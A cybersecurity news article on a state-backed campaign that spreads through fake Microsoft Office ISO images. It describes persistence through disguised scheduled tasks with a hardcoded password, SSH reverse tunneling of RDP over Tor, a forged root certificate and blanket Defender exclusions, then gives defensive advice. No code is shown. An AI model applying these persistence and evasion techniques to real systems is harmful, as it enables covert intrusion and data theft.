APT Hackers Attacking RDP Servers to Deploy Malicious Payloads and Establish Persistence

One of the world’s most dangerous state-backed hacking groups is actively targeting Remote Desktop Protocol (RDP) servers across critical infrastructure, defense organizations, and government agencies.

The threat actor, known as APT-C-13 and widely tracked as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has long been conducting cyber operations since at least 2009.

Its latest campaign, however, marks a sharp shift in strategy — moving away from destructive, one-time strikes toward quiet, long-term infiltration designed to harvest intelligence over extended periods.

The campaign’s entry point is a disguised ISO image named Microsoft.Office.2025x64.v2025.iso, distributed through Telegram channels and software cracking communities in Ukraine.

When a victim mounts the image and tries to install or activate what appears to be Microsoft Office, hidden executors disguised as auto.exe or setup.exe silently launch in the background.

This social engineering trick works because people naturally trust familiar software names. Once triggered, the initial loader profiles the target system and selectively deploys further malicious modules.

Weixin analysts at the 360 Threat Intelligence Center identified this campaign and confirmed that APT-C-13 is deploying a modular penetration framework known as the Tambur/Sumbur/Kalambur series.

Researchers describe the group’s overall shift as moving from “instantaneous disruption” to “intelligence-driven persistent parasitism” — a calculated evolution observed between 2024 and 2026.

One confirmed victim was a technician at a Ukrainian state-owned shipbuilding and machinery manufacturing plant, where the attackers had already established deep, covert access.

The impact of this campaign is serious and far-reaching. Because the attack chain primarily abuses legitimate Windows tools — including scheduled tasks, SSH, PowerShell, and RDP — standard antivirus solutions often fail to raise alerts.

The group is no longer in a hurry; it plants itself quietly and stays for months, slowly extracting sensitive data from within the organization’s trusted environment.

What makes this especially concerning is that by the time most organizations realize something is wrong, the attackers have likely already achieved their objectives.

Persistence Through RDP Hijacking and Covert Tunneling

The most alarming technical aspect of this campaign is how the attackers dig in and stay hidden for extended periods.

The Tambur module establishes persistence by planting scheduled tasks named “Tambur” and “Protector” inside the MicrosoftWindowsWDIProtector path — a location designed to look exactly like a native Windows Diagnostic Infrastructure component.

These tasks run with full administrator-level privileges and use a hardcoded password (1qaz@WSX) to maintain constant, uninterrupted access to the RDP service on the infected host.

The Kalambur and Sumbur modules extend this control further by routing all command-and-control (C2) traffic through the Tor anonymous network, effectively masking the attacker’s real location.

Using SSH reverse tunneling, the attacker maps the victim’s RDP port (3389) to a remote C2 server, enabling silent remote logins from anywhere in the world.

Sumbur, the more refined iteration of this framework, mimics Microsoft Edge’s update service — storing malicious VBScripts in a fake Edge update directory and triggering them every four hours to blend seamlessly with normal software activity.

Rounding out the attack is the DemiMur module, which injects a forged root certificate (DemiMurCA.crt) into the system’s trusted certificate store.

From that point forward, Windows treats all subsequent malicious payloads as fully trusted and signed.

Combined with forced Microsoft Defender exclusions covering the entire C drive, the host’s native security layer is completely neutralized, leaving attackers with a clean and undetected operating environment.

Organizations should immediately block third-party activation tools and unauthorized ISO images from entering their networks, as these serve as the primary delivery channel for this attack.

Internal network behavior — including scheduled task creation, registry modifications, and PowerShell execution — should be closely monitored for signs of tampering. Endpoint security must be kept fully updated with regular comprehensive scans.

Key institutions and industrial organizations should also strengthen internal auditing practices and build specific detection rules targeting anomalous RDP and SSH activity to prevent long-term intelligence theft.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.